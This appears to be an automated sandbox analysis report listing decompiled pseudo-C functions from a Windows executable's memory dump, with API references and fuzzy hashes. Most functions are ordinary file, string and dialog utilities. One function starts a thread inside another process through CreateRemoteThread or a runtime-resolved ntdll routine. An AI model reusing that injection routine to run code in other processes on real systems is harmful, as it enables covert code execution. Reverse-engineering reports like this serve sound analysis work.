                                                                                      			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                      				long _v8;
                                                                                      				void _v8199;
                                                                                      				char _v8200;
                                                                                      
                                                                                      				E0040B550(0x2004, __ecx);
                                                                                      				_v8200 = 0;
                                                                                      				memset( &_v8199, 0, 0x1fff);
                                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                      				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                      			}






                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004072FD
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                      • strlen.MSVCRT ref: 00407328
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2754987064-0
                                                                                      • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                      • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                      • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                      • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                      				int _t7;
                                                                                      				void** _t11;
                                                                                      
                                                                                      				_t11 = __eax;
                                                                                      				if( *0x4101b4 == 0) {
                                                                                      					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                      					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                      					 *0x4101b4 = 1;
                                                                                      					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                      					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                      					 *0x40f2f4 = _t7;
                                                                                      					return 1;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}





                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                      • String ID:
                                                                                      • API String ID: 1386444988-0
                                                                                      • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                      • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                      • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                      • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                      				int _t10;
                                                                                      				int _t12;
                                                                                      				void* _t23;
                                                                                      				wchar_t* _t24;
                                                                                      				signed int _t25;
                                                                                      
                                                                                      				_t24 = __edi;
                                                                                      				_t25 = wcslen(__edi);
                                                                                      				_t10 = wcslen(_a4);
                                                                                      				_t23 = _t10 + _t25;
                                                                                      				if(_t23 >= 0x3ff) {
                                                                                      					_t12 = _t10 - _t23 + 0x3ff;
                                                                                      					if(_t12 > 0) {
                                                                                      						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                      					}
                                                                                      				} else {
                                                                                      					wcscat(__edi + _t25 * 2, _a4);
                                                                                      				}
                                                                                      				return _t24;
                                                                                      			}








                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcslen$wcscatwcsncat
                                                                                      • String ID:
                                                                                      • API String ID: 291873006-0
                                                                                      • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                      • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                      • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                      • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HWND__* _t11;
                                                                                      				struct HWND__* _t14;
                                                                                      				struct HWND__* _t15;
                                                                                      				void* _t16;
                                                                                      
                                                                                      				_t14 = __eax;
                                                                                      				_t16 = __ecx;
                                                                                      				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                      				GetClientRect(__eax, __ecx + 0xa14);
                                                                                      				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                      				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                      				do {
                                                                                      					E00402D99(_t15, _t16);
                                                                                      					_t11 = GetWindow(_t15, 2);
                                                                                      					_t15 = _t11;
                                                                                      				} while (_t15 != 0);
                                                                                      				return _t11;
                                                                                      			}









                                                                                      APIs
                                                                                      • GetClientRect.USER32 ref: 00402DEF
                                                                                      • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                      • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                        • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                        • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4235085887-0
                                                                                      • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                      • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                      • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                      • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 72%
                                                                                      			E0040B6A6() {
                                                                                      				intOrPtr _t1;
                                                                                      				intOrPtr _t2;
                                                                                      				intOrPtr _t3;
                                                                                      				intOrPtr _t4;
                                                                                      
                                                                                      				_t1 =  *0x41c458;
                                                                                      				if(_t1 != 0) {
                                                                                      					_push(_t1);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t2 =  *0x41c460;
                                                                                      				if(_t2 != 0) {
                                                                                      					_push(_t2);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t3 =  *0x41c45c;
                                                                                      				if(_t3 != 0) {
                                                                                      					_push(_t3);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t4 =  *0x41c464;
                                                                                      				if(_t4 != 0) {
                                                                                      					_push(_t4);
                                                                                      					L0040B272();
                                                                                      					return _t4;
                                                                                      				}
                                                                                      				return _t4;
                                                                                      			}








                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                      • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                      • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                      • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				void* _v16;
                                                                                      				wchar_t* _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				char _v36;
                                                                                      				void* __edi;
                                                                                      				signed int _t39;
                                                                                      				wchar_t* _t41;
                                                                                      				signed int _t45;
                                                                                      				signed int _t48;
                                                                                      				wchar_t* _t53;
                                                                                      				wchar_t* _t62;
                                                                                      				void* _t66;
                                                                                      				intOrPtr* _t68;
                                                                                      				void* _t70;
                                                                                      				wchar_t* _t75;
                                                                                      				wchar_t* _t79;
                                                                                      
                                                                                      				_t66 = __ebx;
                                                                                      				_t75 = 0;
                                                                                      				_v8 = 0;
                                                                                      				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                      					do {
                                                                                      						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                      						_t68 = _a8;
                                                                                      						if(_t68 != _t75) {
                                                                                      							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                      						} else {
                                                                                      							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                      						}
                                                                                      						_t41 = wcschr(_t79, 0x2c);
                                                                                      						_pop(_t70);
                                                                                      						if(_t41 != 0) {
                                                                                      							L8:
                                                                                      							_v20 = _t75;
                                                                                      							_v28 = _t75;
                                                                                      							_v36 = _t75;
                                                                                      							_v24 = 0x100;
                                                                                      							_v32 = 1;
                                                                                      							_v16 = 0x22;
                                                                                      							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                      							while(1) {
                                                                                      								_t45 =  *_t79 & 0x0000ffff;
                                                                                      								__eflags = _t45;
                                                                                      								_v12 = _t45;
                                                                                      								_t77 =  &_v36;
                                                                                      								if(__eflags == 0) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eflags = _t45 - 0x22;
                                                                                      								if(__eflags != 0) {
                                                                                      									_push( &_v12);
                                                                                      									_t48 = 1;
                                                                                      									__eflags = 1;
                                                                                      								} else {
                                                                                      									_push(L"\"\"");
                                                                                      									_t48 = _t45 | 0xffffffff;
                                                                                      								}
                                                                                      								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                      								_t79 =  &(_t79[0]);
                                                                                      								__eflags = _t79;
                                                                                      							}
                                                                                      							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                      							_t53 = _v20;
                                                                                      							__eflags = _t53;
                                                                                      							if(_t53 == 0) {
                                                                                      								_t53 = 0x40c4e8;
                                                                                      							}
                                                                                      							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                      							_t75 = 0;
                                                                                      							__eflags = 0;
                                                                                      						} else {
                                                                                      							_t62 = wcschr(_t79, 0x22);
                                                                                      							_pop(_t70);
                                                                                      							if(_t62 != 0) {
                                                                                      								goto L8;
                                                                                      							} else {
                                                                                      								E00407343(_t66, _a4, _t79);
                                                                                      							}
                                                                                      						}
                                                                                      						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                      							E00407343(_t66, _a4, ",");
                                                                                      						}
                                                                                      						_v8 = _v8 + 1;
                                                                                      					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                      				}
                                                                                      				return E00407343(_t66, _a4, L"\r\n");
                                                                                      			}
























                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 004073A4
                                                                                      • wcschr.MSVCRT ref: 004073B2
                                                                                        • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                        • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcschr$memcpywcslen
                                                                                      • String ID: "
                                                                                      • API String ID: 1983396471-123907689
                                                                                      • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                      • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                      • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                      • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                      				void* _v8;
                                                                                      				char _v12;
                                                                                      				char* _v20;
                                                                                      				long _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				char* _v36;
                                                                                      				signed int _v40;
                                                                                      				void _v44;
                                                                                      				char _v48;
                                                                                      				char _v52;
                                                                                      				struct _OSVERSIONINFOW _v328;
                                                                                      				void* __esi;
                                                                                      				signed int _t40;
                                                                                      				intOrPtr* _t44;
                                                                                      				void* _t49;
                                                                                      				struct HINSTANCE__** _t54;
                                                                                      				signed int _t55;
                                                                                      
                                                                                      				_t54 = __eax;
                                                                                      				_v328.dwOSVersionInfoSize = 0x114;
                                                                                      				GetVersionExW( &_v328);
                                                                                      				if(_v328.dwMajorVersion < 6) {
                                                                                      					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                      				}
                                                                                      				E0040A1EF(_t54);
                                                                                      				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                      				if(_t44 != 0) {
                                                                                      					_t55 = 8;
                                                                                      					memset( &_v44, 0, _t55 << 2);
                                                                                      					_v12 = 0;
                                                                                      					asm("stosd");
                                                                                      					_v36 =  &_v12;
                                                                                      					_v20 =  &_v52;
                                                                                      					_v48 = 0x24;
                                                                                      					_v44 = 0x10003;
                                                                                      					_v40 = _t55;
                                                                                      					_v28 = 0x10004;
                                                                                      					_v24 = 4;
                                                                                      					_a16 = 0;
                                                                                      					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                      					asm("sbb eax, eax");
                                                                                      					return  !( ~_t40) & _a16;
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}





















                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?,74B068A0,00000000), ref: 0040A290
                                                                                      • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                        • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                        • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                      • String ID: $
                                                                                      • API String ID: 283512611-3993045852
                                                                                      • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                      • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                      • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                      • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 45%
                                                                                      			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                      				char _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				char _v80;
                                                                                      				signed short _v65616;
                                                                                      				void* _t27;
                                                                                      				intOrPtr _t28;
                                                                                      				void* _t34;
                                                                                      				intOrPtr _t39;
                                                                                      				intOrPtr* _t51;
                                                                                      				void* _t52;
                                                                                      
                                                                                      				_t51 = __esi;
                                                                                      				E0040B550(0x1004c, __ecx);
                                                                                      				_t39 = 0;
                                                                                      				_push(0);
                                                                                      				_push( &_v8);
                                                                                      				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                      				_push(L"Lines");
                                                                                      				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                      				if(_v8 > 0) {
                                                                                      					do {
                                                                                      						_t6 = _t39 + 1; // 0x1
                                                                                      						_t28 = _t6;
                                                                                      						_push(_t28);
                                                                                      						_push(L"Line%d");
                                                                                      						_v12 = _t28;
                                                                                      						_push(0x1f);
                                                                                      						_push( &_v80);
                                                                                      						L0040B1EC();
                                                                                      						_t52 = _t52 + 0x10;
                                                                                      						_push(0x7fff);
                                                                                      						_push(0x40c4e8);
                                                                                      						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                      							_v65616 = _v65616 & 0x00000000;
                                                                                      							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                      							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                      						} else {
                                                                                      							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                      						}
                                                                                      						_t39 = _v12;
                                                                                      					} while (_t39 < _v8);
                                                                                      					return _t34;
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}














                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: Line%d$Lines
                                                                                      • API String ID: 3988819677-2790224864
                                                                                      • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                      • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                      • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                      • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                      				void* _v8;
                                                                                      				void* _v26;
                                                                                      				void _v28;
                                                                                      				void* _t24;
                                                                                      				void* _t25;
                                                                                      				void* _t35;
                                                                                      				signed int _t38;
                                                                                      				signed int _t42;
                                                                                      				void* _t44;
                                                                                      				void* _t45;
                                                                                      
                                                                                      				_t24 = _a12;
                                                                                      				_t45 = _t44 - 0x18;
                                                                                      				_t42 = 0;
                                                                                      				 *_t24 = 0;
                                                                                      				if(_a8 <= 0) {
                                                                                      					_t25 = 0;
                                                                                      				} else {
                                                                                      					_t38 = 0;
                                                                                      					_t35 = 0;
                                                                                      					if(_a8 > 0) {
                                                                                      						_v8 = _t24;
                                                                                      						while(1) {
                                                                                      							_v28 = _v28 & 0x00000000;
                                                                                      							asm("stosd");
                                                                                      							asm("stosd");
                                                                                      							asm("stosd");
                                                                                      							asm("stosd");
                                                                                      							asm("stosw");
                                                                                      							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                      							_push(L"%2.2X ");
                                                                                      							_push(0xa);
                                                                                      							_push( &_v28);
                                                                                      							L0040B1EC();
                                                                                      							_t38 = _t42;
                                                                                      							memcpy(_v8,  &_v28, 6);
                                                                                      							_t13 = _t42 + 3; // 0x3
                                                                                      							_t45 = _t45 + 0x1c;
                                                                                      							if(_t13 >= 0x2000) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_v8 = _v8 + 6;
                                                                                      							_t35 = _t35 + 1;
                                                                                      							_t42 = _t42 + 3;
                                                                                      							if(_t35 < _a8) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							break;
                                                                                      						}
                                                                                      						_t24 = _a12;
                                                                                      					}
                                                                                      					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                      					_t25 = 1;
                                                                                      				}
                                                                                      				return _t25;
                                                                                      			}














                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemcpy
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2789212964-323797159
                                                                                      • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                      • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                      • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                      • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 43%
                                                                                      			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				char _v44;
                                                                                      				intOrPtr _t22;
                                                                                      				signed int _t30;
                                                                                      				signed int _t34;
                                                                                      				void* _t35;
                                                                                      				void* _t36;
                                                                                      
                                                                                      				_t35 = __esi;
                                                                                      				_t34 = 0;
                                                                                      				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                      					do {
                                                                                      						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                      						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                      						L0040B1EC();
                                                                                      						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                      						_push( &_v44);
                                                                                      						_push(0x2000);
                                                                                      						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                      						L0040B1EC();
                                                                                      						_t36 = _t36 + 0x24;
                                                                                      						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                      						_t34 = _t34 + 1;
                                                                                      					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                      				}
                                                                                      				return E00407343(_t35, _a4, L"\r\n");
                                                                                      			}










                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: %%-%d.%ds
                                                                                      • API String ID: 3988819677-2008345750
                                                                                      • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                      • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                      • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                      • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                      				intOrPtr _v20;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				intOrPtr _v44;
                                                                                      				intOrPtr _v48;
                                                                                      				wchar_t* _v52;
                                                                                      				intOrPtr _v56;
                                                                                      				intOrPtr _v64;
                                                                                      				intOrPtr _v68;
                                                                                      				intOrPtr _v76;
                                                                                      				struct tagOFNA _v80;
                                                                                      
                                                                                      				_v76 = __eax;
                                                                                      				_v68 = _a4;
                                                                                      				_v64 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_v36 = 0;
                                                                                      				_v32 = _a8;
                                                                                      				_v20 = _a12;
                                                                                      				_v80 = 0x4c;
                                                                                      				_v56 = 1;
                                                                                      				_v52 = __esi;
                                                                                      				_v48 = 0x104;
                                                                                      				_v28 = 0x81804;
                                                                                      				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					wcscpy(__esi, _v52);
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}
















                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
